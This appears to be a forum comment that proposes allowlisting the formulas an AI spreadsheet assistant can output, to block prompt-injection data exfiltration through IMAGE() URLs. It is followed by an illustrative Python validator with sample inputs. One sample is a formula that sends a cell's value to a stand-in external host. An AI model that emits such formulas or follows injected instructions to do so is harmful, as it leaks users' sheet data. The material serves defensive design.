by adilkhanovkz 46 days ago
Could a cheap fix here be whitelisting the output? If the AI can only emit a known set of formulas, you can't inject IMAGE() with arbitrary URLs because the output channel doesn't support it. You can't inject what the emitter can't produce. It doesn't fix all prompt injection, but it kills the exfiltration class.
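An added example of the allowlisting idea above, written here as an illustration and not code from the commenter or from any spreadsheet product: a fail-closed validator that sits between the model and the sheet. It only accepts a formula if every token fits a small grammar (cell references, numbers, operators, parentheses, commas) and every function name is in an assumed allowlist; string literals are not part of the grammar at all, so there is no way to smuggle a URL into IMAGE(), HYPERLINK() or anything else. The allowlist contents and the `check_formula` name are this example's own choices.

```python
import re
from dataclasses import dataclass

# Assumed allowlist: the only formula functions the model output may contain.
ALLOWED_FUNCTIONS = frozenset({"SUM", "AVERAGE", "MIN", "MAX", "COUNT", "IF", "ROUND", "ABS"})

# Minimal formula grammar. No string literals, no '&' concatenation: the
# channel simply has no token that could carry a URL.
_TOKEN = re.compile(r"""
      (?P<ws>\s+)
    | (?P<func>[A-Z][A-Z0-9_.]*)(?=\s*\()                     # name directly before '('
    | (?P<ref>\$?[A-Z]{1,3}\$?\d+(?::\$?[A-Z]{1,3}\$?\d+)?)  # A1, $B$2, A1:C9
    | (?P<num>\d+(?:\.\d+)?)
    | (?P<op><=|>=|<>|[-+*/^=<>])
    | (?P<punct>[(),])
""", re.VERBOSE)


@dataclass
class Verdict:
    ok: bool
    reason: str
    functions: tuple  # function names seen, in order


def check_formula(text: str) -> Verdict:
    """Accept a model-emitted formula only if every token is in the grammar
    and every function is allowlisted. Anything unrecognised is rejected."""
    text = text.strip().upper()  # safe: the grammar has no string literals
    if not text.startswith("="):
        return Verdict(False, "not a formula", ())
    pos, depth, funcs = 1, 0, []
    while pos < len(text):
        m = _TOKEN.match(text, pos)
        if m is None:
            # Covers quotes, '&', '@', URLs, anything outside the grammar.
            return Verdict(False, f"unexpected character {text[pos]!r} at {pos}", tuple(funcs))
        kind = m.lastgroup
        if kind == "func":
            name = m.group("func")
            if name not in ALLOWED_FUNCTIONS:
                return Verdict(False, f"function {name} not in allowlist", tuple(funcs))
            funcs.append(name)
        elif kind == "punct":
            ch = m.group()
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth < 0:
                    return Verdict(False, "unbalanced ')'", tuple(funcs))
        pos = m.end()
    if depth != 0:
        return Verdict(False, "unbalanced '('", tuple(funcs))
    return Verdict(True, "ok", tuple(funcs))


if __name__ == "__main__":
    # Constructed sample outputs, as a model might emit them.
    for candidate in [
        "=SUM(A1:A10)",
        "=IF(B2>0, ROUND(B2/C2, 2), 0)",
        '=IMAGE("https://example.invalid/x?d="&A1)',  # exfiltration attempt
        '="x"&A1',
        "=SUM(A1",
    ]:
        print(f"{candidate!r:50} -> {check_formula(candidate)}")
```

The design point is that the validator is a parser, not a blocklist: it never looks for "IMAGE" or "http" specifically, so a new function name or an encoding trick does not get past it. The cost is the one the comment accepts, namely that the model can only produce what the grammar and allowlist permit.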